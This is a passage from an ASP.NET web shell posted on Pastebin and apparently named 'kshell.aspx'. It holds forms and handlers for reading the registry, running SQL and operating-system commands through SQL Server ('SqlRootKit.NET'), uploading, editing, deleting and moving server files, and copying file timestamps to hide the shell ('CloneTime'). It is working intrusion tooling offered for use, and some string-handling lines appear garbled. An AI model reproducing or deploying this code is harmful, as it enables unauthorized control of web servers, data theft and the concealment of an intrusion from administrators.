  1468.     Key:&nbsp;&nbsp;
  1469.     <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br>
  1470.     Value:
  1471.     <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox>&nbsp;&nbsp;
  1472.     <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1473.     <p>
  1474.     <asp:Label ID="lblresultReg" runat="server" style="color: red"/>      
  1475.     </p>
  1476.     </form>
  1477. <%
  1478.     case "sqlman"
  1479. %>
  1480. <form runat="server">
  1481.   <p>[ MSSQL Query ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1482.   <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  1483.   <p>Host:
  1484.     <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  1485.   <p>
  1486.   SQL Name:
  1487.     <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  1488.   SQL Password:
  1489.   <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/>
  1490.   </p>
  1491.   Command:
  1492.   <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br>
  1493.   <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/>  
  1494.   <p>
  1495.    <asp:Label ID="lblresultSQL" runat="server" style="style2"/>      </p>
  1496. </form>
  1497. <%
  1498.     case "sqlrootkit"
  1499. %>
  1500. <form runat="server">
  1501.   <p>[ SqlRootKit.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1502.   <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  1503.   <p>Host:
  1504.     <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  1505.   <p>
  1506.   SQL Name:
  1507.     <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  1508.   SQL Password:
  1509.   <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  1510.   </p>
  1511.   Command:
  1512.   <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  1513.   <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>  
  1514.   <p>
  1515.    <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
  1516. </form>
  1517. <%
  1518.     case "del"
  1519.         dim a as string
  1520.         a=request.QueryString("src")
  1521.         call existdir(a)
  1522.         call del(a)  
  1523.         response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
  1524.     case "copy"
  1525.         call existdir(request.QueryString("src"))
  1526.         session("cutboard")="" & request.QueryString("src")
  1527.         response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
  1528.     case "cut"
  1529.         call existdir(request.QueryString("src"))
  1530.         session("cutboard")="" & request.QueryString("src")
  1531.         response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
  1532.     case "paste"
  1533.         dim ow as integer
  1534.         if request.Form("OverWrite")<>"" then ow=1
  1535.         if request.Form("Cancel")<>"" then ow=2
  1536.         url=request.QueryString("src")
  1537.         call existdir(url)
  1538.         dim d as string
  1539.         d=session("cutboard")
  1540.         if left(d,1)="" then
  1541.             TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  1542.             TEMP2=url & replace(path.getfilename(d),"","")
  1543.             if right(d,1)="\" then  
  1544.                 call xexistdir(TEMP1,ow)
  1545.                 directory.move(replace(d,"",""),TEMP1 & "\")  
  1546.                 response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1547.             else
  1548.                 call xexistdir(TEMP2,ow)
  1549.                 file.move(replace(d,"",""),TEMP2)
  1550.                 response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1551.             end if
  1552.         else
  1553.             TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  1554.             TEMP2=url & path.getfilename(replace(d,"",""))
  1555.             if right(d,1)="\" then
  1556.                 call xexistdir(TEMP1,ow)
  1557.                 directory.createdirectory(TEMP1)
  1558.                 call copydir(replace(d,"",""),TEMP1 & "\")
  1559.                 response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1560.             else
  1561.                 call xexistdir(TEMP2,ow)
  1562.                 file.copy(replace(d,"",""),TEMP2)
  1563.                 response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1564.             end if
  1565.         end if
  1566.     case "upfile"
  1567.         url=request.QueryString("src")
  1568. %>
  1569. <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
  1570.  You will upload file to this directory : <span class="style3"><%=url%></span><br>
  1571.  Please choose file from your computer :
  1572.  <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
  1573.     <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
  1574. </form>
  1575. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
  1576. <%
  1577.     case "new"
  1578.         url=request.QueryString("src")
  1579. %>
  1580. <form runat="server">
  1581.   <%=url%><br>
  1582.   Name:
  1583.   <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  1584.   <br>
  1585.   <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  1586.   <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  1587.   <br>
  1588.   <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>  
  1589.   <input name="Src" type="hidden" value="<%=url%>">
  1590. </form>
  1591. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1592. <%
  1593.     case "edit"
  1594.         dim b as string
  1595.         b=request.QueryString("src")
  1596.         call existdir(b)
  1597.         dim myread as new streamreader(b,encoding.default)
  1598.         filepath.text=b
  1599.         content.text=myread.readtoend
  1600. %>
  1601. <form runat="server">
  1602.   <table width="100%"  border="1" align="center">
  1603.     <tr>      <td width="11%">Path</td>
  1604.       <td width="89%">
  1605.       <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
  1606.       *</td>
  1607.     </tr>
  1608.     <tr>
  1609.       <td>Content</td>
  1610.       <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
  1611.     </tr>
  1612.     <tr>
  1613.       <td></td>
  1614.       <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>        
  1615.       </td>
  1616.     </tr>
  1617.   </table>
  1618. </form>
  1619. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1620. <%
  1621.         myread.close
  1622.     case "rename"
  1623.         url=request.QueryString("src")
  1624.         if request.Form("name")="" then
  1625.     %>
  1626. <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  1627.   <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
  1628.     <input type="text" name="name" class="TextBox">
  1629.     <input type="submit" name="Submit3" value="Submit" class="buttom">
  1630. </p>
  1631. </form>
  1632. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1633. <script language="javascript">
  1634. function checkname()
  1635. {
  1636. if(formRn.name.value==""){alert("You shall input filename :(");return false}
  1637. }
  1638. </script>
  1639.   <%
  1640.         else
  1641.             if Rename() then
  1642.                 response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  1643.             else
  1644.                 response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  1645.             end if
  1646.         end if
  1647.     case "samename"
  1648.         url=request.QueryString("src")
  1649. %>
  1650. <form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
  1651. <p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  1652.   <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
  1653. <input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
  1654. </form>
  1655. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1656.    <%
  1657.     case "clonetime"
  1658.         time1.Text=request.QueryString("src")&"kshell.aspx"
  1659.         time2.Text=request.QueryString("src")
  1660.     %>
  1661. <form runat="server">
  1662.   <p>[CloneTime for WebAdmin]<i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:history.back(1);">Back</a></i> </p>
  1663.   <p>A tool that it copy the file or directory's time to another file or directory </p>
  1664.   <p>Rework File or Dir:
  1665.     <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  1666.   <p>Copied File or Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  1667.     <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
  1668. <asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
  1669. </form>
  1670. <p>
  1671.   <%
  1672.     case "logout"
  1673.         session.Abandon()
  1674.         response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
  1675.     end select
  1676. end if
  1677. Catch error_x
  1678.     response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message)
  1679. End Try
  1680. %>
  1681. </p>
  1682. </p>
  1683. <hr>
  1684. <script language="javascript">
  1685. function closewindow()
  1686. {self.close();}
  1687. </script>
  1688. </body>
  1689. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top